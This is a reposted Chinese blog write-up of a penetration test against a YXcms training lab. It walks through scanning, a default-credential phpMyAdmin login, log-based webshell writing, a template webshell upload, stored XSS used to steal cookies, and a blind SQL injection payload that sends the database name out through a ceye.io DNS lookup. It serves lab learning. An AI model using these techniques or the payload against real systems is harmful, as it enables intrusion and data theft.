碼上快樂

相關內容    簡體    繁體

一次對YXcms靶場的測試記錄

本文轉載自   查看原文   2021-12-08 15:24   758    web安全

信息收集

登錄目標網址

登錄目標網址,會發現是phpstudy的探針,從中可以獲取一些關於目標網站的信息

  • 網站有phpinfo,php版本是5.4.5
  • 服務器用的是apache2.4.23
  • 網站會顯示錯誤信息
  • mysql數據庫
  • 使用了phpstudy

    以上這些是我目前能察覺到危險的信息
    補充:關於目標網站分析的插件:wappalyzer

js接口

目前不知道如何判斷js文件里有沒有有用信息

目錄掃描

phpinfo.php

phpmyadmin

beifen.rar

robots.txt

端口掃描

結果


看到了445端口,win7的系統

進入yxcms

通過phpmyadmin的弱口令進入管理頁面植入shell后,發現目標站點在根目錄下布置了一個網站yxcms

信息收集

瀏覽網頁信息

  • 發現在公告欄處公布了后台地址、賬戶、密碼
  • 找到可以留言的文章,留言后需要管理員審核

目錄掃描

robots.txt


無有用信息

phblic


網站的一些源代碼,但我目前讀不懂代碼,不清楚有沒有有用信息

upload


網站的一些基本信息,主要為圖片

protected

  • 點擊目錄下各文件,在adminApi.php文件出現報錯信息,得到絕對路徑

    點遍所有目錄下文件,沒發現其他有用信息
httpd.ini


無可用信息

升級日志.txt


可以得到版本是1.2.1,在得到網站使用的cms和版本號,我們可以在百度搜對應的漏洞來利用,參考這篇:https://www.ebounce.cn/web/yxcms.html

漏洞測試

永恆之藍

利用kail的msfconsole

一頓操作猛如虎,就是進不去,利用失敗

phpmyadmin

獲取版本號

失敗~ 、~

獲取當前phpmyadmin版本號的方法

在根目錄下添加:

  • README
  • ChangeLog
  • doc/html/index.html
  • Change
  • changelog.php
  • readme.php
  • Documetation.html
  • Documetation.txt
  • translators.html

嘗試賬號

嘗試了可以任意登陸的賬號,結果均失敗~ 、~

准備暴力破解賬號

試了admin,admin。它的賬號和密碼其實是root,root。
mysql數據庫的默認用戶和密碼是:root,root

獲取絕對路徑

因為目錄掃描時我們獲得了phpinfo.php文件,可在里面獲得目標的絕對路徑

寫shell

正常導出獲取shell

判斷是否可寫


為null代表禁止寫入

不能在根路徑下寫入文件

通過日志寫入webshell

開啟日志記錄

查看當前的日志記錄

指定日志文件

寫入惡意代碼

shell連接

通過慢查詢寫如webshell

查詢當前慢查詢日志目錄

重新設置路徑

開啟慢查詢日志

寫入日志

shell連接

再次嘗試正常導出獲取webshell

修改secure_file_priv后的值為空



但結果失敗

試着重啟一下靶場的服務


這就很尷尬,實際滲透中,如果你已經通過其它方式獲取到了shell,則沒有必要去通過直接導出的方式。

后台

進入后台

點擊各個功能模塊

第一遍各個點了一遍沒有發現什么可以利用的模塊

網上找了文章,發現自己錯過了一個可利用模塊,對網站的結構不敏感

新建模板,上傳一句話木馬

如何確定剛才模板文件的路徑

我也不知道,新建立的模板文件上傳到哪個路徑了,但是我們不是獲得了一個備份文件嗎,解壓后,用搜索文件軟件listary進行搜索目標模板位置已有的文件,可確定路徑

連接shell

XSS

插入xss代碼


進入后台審核



當然,這是建立在管理員什么都不懂的情況下,如果管理員看懂了代碼,直接刪除這條留言;也可能會有攻擊者留一段正常的留言,比如對這個網站的喜歡和適用中的意見,但是文字靠后部分插入了一段代碼。

結果(失敗)


結果分析:輸出了我們輸入的內容沒有過濾,但是沒有產生對應的彈窗結果。也沒有過濾特殊符號。

其他位置嘗試


依然失敗,我們輸入的地方可能不對

網上找資料

會發現成功的地方在留言本這里,會發現測xss漏洞的原則是一切可以進行輸入的地方

再一次插入xss代碼

審核(進入審核界面,首先彈出來彈窗)

審核后

利用xss平台獲取cookie

平台獲取數據

后台SQL注入

漏洞所在位置

代理抓包


構造payload

payload:and if ((select load_file(concat('\\',(select database()),'.xxxx.ceye.io\abc'))),1,1))--

攻擊結果

補充

  • 要注意在burp suite里的文字格式設置為英文字體,否則會出現引號的不匹配問題。
  • 剛開始滲透的我們很難一開始就分析代碼,找到漏洞所在,但是我們刻意利用搜索引擎找到目標適用版本對應的漏洞來進行驗證是否存在,這個過程是從0到1的過程,0與1之間會有很多中間階段


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 記一次vulhub搭建漏洞靶場 一次簡單的內網滲透靶場實戰 記一次sqlmap對某靶場網站的掃描 一次Dapper高並發測試報告記錄. 結果.... 記錄一次較為完整服務器性能測試 python + locust 記錄一次性能測試的實施 【測試工程師面試】記錄自己的一次面試 對HashMap的一次記錄 記一次360眾測靶場考核 第一次靶場練習:SQL注入(1)
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM